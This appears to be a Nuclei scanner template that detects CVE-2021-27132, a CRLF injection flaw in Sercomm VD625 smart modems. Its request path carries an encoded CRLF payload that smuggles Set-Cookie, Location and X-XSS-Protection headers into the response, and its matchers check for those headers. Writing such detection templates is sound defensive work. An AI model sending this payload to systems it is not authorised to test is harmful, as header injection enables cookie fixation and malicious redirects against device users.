30 lines
871 B
YAML
30 lines
871 B
YAML
id: CVE-2021-27132
|
|
|
|
info:
|
|
name: CRLF Injection - Sercomm VD625
|
|
author: geeknik
|
|
severity: medium
|
|
description: Sercomm AGCOMBO VD625 Smart Modems with firmware version AGSOT_2.1.0 are vulnerable to CRLF Injection via the Content-Disposition header - https://cybertuz.com/blog/post/crlf-injection-CVE-2021-27132
|
|
tags: cve,cve2021,crlf
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 404
|
|
part: header
|
|
|
|
- type: word
|
|
words:
|
|
- "Content-Disposition: attachment;filename=test.txt"
|
|
- "Set-Cookie:CRLFInjection=Test"
|
|
- "Location: example.com"
|
|
- "X-XSS-Protection:0"
|
|
part: header
|
|
condition: and
|